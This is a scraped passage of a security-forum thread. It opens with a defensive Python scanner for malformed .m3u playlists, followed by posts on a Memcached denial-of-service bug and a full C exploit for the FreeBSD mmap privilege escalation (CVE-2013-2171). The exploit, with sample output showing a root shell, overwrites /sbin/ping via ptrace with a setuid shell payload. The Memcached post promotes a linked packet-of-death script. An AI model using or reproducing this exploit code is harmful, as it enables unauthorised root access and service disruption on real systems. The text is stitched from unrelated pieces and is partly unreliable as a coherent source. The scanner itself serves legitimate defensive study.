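The CVE-2006-0720 description above boils down to an unbounded copy of a playlist entry into a fixed stack buffer. As an added example (not part of the post or of the exploit), here is a defensive scanner that flags .m3u files carrying the pattern that such a crash requires: an entry far longer than any path buffer, or one containing bytes that never occur in a file name or URL. The 260-byte threshold is the Windows MAX_PATH limit; the format handling is an assumption about well-formed M3U.

```python
# Added example: a defensive .m3u scanner for oversized or binary playlist
# entries. Thresholds and format assumptions are this example's, not the post's.
MAX_PATH = 260  # Windows path limit; a legitimate entry should never exceed it


def suspicious_m3u_entries(data, max_len=MAX_PATH):
    """Return [(line_no, reason)] for entries a real player would never write.

    Directive lines (#EXTM3U, #EXTINF:...) are metadata and are skipped; every
    other non-empty line is a path or URL and is checked for length and for
    bytes outside printable ASCII (NOP sleds and shellcode fail that test)."""
    findings = []
    for no, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue
        if len(line) > max_len:
            findings.append((no, "entry length %d exceeds %d" % (len(line), max_len)))
        if any(b < 0x20 or b > 0x7E for b in line):
            findings.append((no, "non-printable bytes in entry"))
    return findings


def is_suspicious(data, max_len=MAX_PATH):
    """True when the playlist should be quarantined rather than opened."""
    return bool(suspicious_m3u_entries(data, max_len))


# Constructed samples: a normal playlist, and one shaped like the post's boom.m3u
# (262 filler bytes followed by a NOP-like sled), without any real payload.
BENIGN = b"#EXTM3U\n#EXTINF:123,Artist - Title\nC:\\Music\\track01.mp3\n"
CRAFTED = (b"#EXTM3U\n#EXTINF:1234,Pwnage Rock\n"
           + b"A" * 262 + b"\x90" * 100 + b"\n")
```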
  19. [h=1]Memcached Remote Denial of Service PoC[/h]
A long time ago, in 2011, a rather serious vulnerability was reported in Memcached. It is now 2013, and the vulnerability still exists in the latest version on the memcached Google Code page.

The report is here: https://code.google.com/p/memcached/issues/detail?id=192

Now, as you can see, by sending a specially crafted packet, we can cause Memcached to segfault, and essentially die. Memcached is used by a lot of high profile sites to speed up page load times, and killing it would impact a bit on site performance, so I was rather curious as to why this bug had not yet been killed.

As you can see from the report, the vulnerability is trivial to exploit. Just send the magic packet of death and it kills the memcached service. I tried to get remote code execution from it, but had no luck at all. Perhaps one of you might have more luck!

memcached ded

Exploit code available to download here: killthebox.py

As always, responsible use is encouraged. Killing $(big website) memcached might get you in trouble, so don’t do it.

As for the memcached devs: You have known about this for two bloody years and never fixed it. This is terribly irresponsible of you. Fix it.

Source: Memcached Remote Denial of Service PoC | Insecurety Research
  20. [h=2]FreeBSD mmap Privilege Escalation Exploit[/h]

/**
 * FreeBSD privilege escalation CVE-2013-2171 (credits Konstantin Belousov & Alan Cox)
 *
 * tested on FreeBSD 9.1
 * ref: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
 *
 * @_hugsy_
 *
 * Syntax :
 * $ id
 * uid=1001(user) gid=1001(user) groups=1001(user)
 * $ gcc -Wall ./mmap.c && ./a.out
 * [+] Saved old '/sbin/ping'
 * [+] Using mmap-ed area at 0x281a4000
 * [+] Attached to 3404
 * [+] Copied 4917 bytes of payload to '/sbin/ping'
 * [+] Triggering payload
 * # id
 * uid=0(root) gid=0(wheel) egid=1001(user) groups=1001(user),0(wheel)
 *
 * Note : TARGET (default /sbin/ping) will lose its SUID bit on restore, must be restored by hand
 *
 */

#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>

#define LEN 1000*getpagesize()
#define TARGET "/sbin/ping" // will lose its SUID bit on restore, must be restored by hand

void kaboom(int pid, caddr_t addr)
{
    int nb, i, a, fd, n;
    char buf[60000] = {0,};

    a = i = 0;

    fd = open(TARGET, O_RDONLY);
    nb = read(fd, buf, 60000);
    close(fd);
    printf("[+] Saved old '%s'\n", TARGET);
    printf("[+] Using mmap-ed area at %p\n", addr);

    if (ptrace(PT_ATTACH, pid, 0, 0) < 0) {
        perror("[-] ptrace(PT_ATTACH) failed");
        return;
    }
    printf("[+] Attached to %d\n", pid);
    wait(NULL);

    fd = open("./sc.c", O_WRONLY|O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH);
    write(fd, "#include <stdio.h>\nmain(){ char* s[]={\"/bin/sh\",NULL};setuid(0);execve(s[0],s,0); }\n",84);
    close(fd);

    if (system("gcc -o ./sc ./sc.c") != 0) {
        perror("[-] gcc");
        return;
    }

    fd = open("./sc", O_RDONLY);
    while (1) {
        int a;
        int n = read(fd, &a, sizeof(int));
        if (n <= 0) break;
        if (ptrace(PT_WRITE_D, pid, addr+i, a) < 0) {
            perror("[-] ptrace(PT_WRITE_D) failed");
            return;
        }
        i+=n;
    }
    close(fd);
    printf("[+] Copied %d bytes of payload to '%s'\n", i, TARGET);

    printf("[+] Triggering payload\n");
    system(TARGET);

    printf("[+] Restoring '%s'\n", TARGET);
    for (n=0, i=0; n<nb; n++) {
        if (ptrace(PT_WRITE_D, pid, addr+n, *(buf+n)) < 0) {
            perror("[-] ptrace(PT_WRITE_D) failed");
            return;
        }
    }
    ptrace(PT_DETACH, pid, 0, 0);
    printf("[+] Done\n");
    return;
}

void dummy(int fd, caddr_t addr)
{
    sleep(1);
    munmap(addr, LEN);
    close(fd);
    return;
}

int main(int argc, char** argv, char** envp)
{
    int fd = open(TARGET, O_RDONLY);
    caddr_t addr = mmap(NULL, LEN, PROT_READ, MAP_SHARED, fd, 0);
    pid_t forked_pid = fork();

    switch(forked_pid) {
        case -1:
            return -1;
        case 0:
            dummy(fd, addr);
            break;
        default:
            munmap(addr, LEN);
            close(fd);
            kaboom(forked_pid, addr);
            wait(NULL);
            break;
    }
    return 0;
}

Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  21. They invented hacking.
  22. We'll see over the weekend.
  23. I hadn't seen that "Self".
  24. How do you exploit it?
  25. New Bounty Program Details - Security Research & Defense - Site Home - TechNet Blogs